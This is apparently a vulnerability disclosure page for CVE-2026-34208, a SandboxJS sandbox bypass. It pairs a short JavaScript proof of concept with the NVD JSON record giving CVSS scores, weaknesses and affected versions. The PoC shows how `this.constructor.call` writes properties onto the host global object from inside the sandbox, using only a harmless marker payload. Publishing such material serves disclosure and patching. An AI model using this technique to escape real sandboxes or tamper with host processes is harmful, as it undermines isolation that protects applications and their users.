CVE-2026-34208

// PoC for CVE-2026-34208: SandboxJS Sandbox Bypass // Vulnerable versions: < 0.8.36 const { Sandbox } = require('sandboxjs'); function exploit() { // Define the payload object to be written to the global scope const payload = { malicious: true, // Attempt to overwrite a global property process: { env: { POLLUTED: "YES" } } }; // 1. Use 'this.constructor' to get a reference to the internal SandboxGlobal constructor. // 2. Use .call() to invoke this constructor. // 3. Set the 'this' context of the constructor to the actual host global object. // 4. Pass the payload object to merge/write properties. let target = globalThis; // Execute the bypass this.constructor.call(target, payload); } // Run the exploit inside the sandbox const sandbox = new Sandbox(); sandbox.run(exploit); // Verification if (globalThis.malicious === true) { console.log("[+] PoC successful: Global object polluted."); }

{"cve": {"id": "CVE-2026-34208", "sourceIdentifier": "[email protected]", "published": "2026-04-06T16:16:34.580", "lastModified": "2026-04-09T18:07:20.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}, {"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.8.36", "matchCriteriaId": "F87D3BD6-FACF-45C3-92E4-F411C229C9C6"}]}]}], "references": [{"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}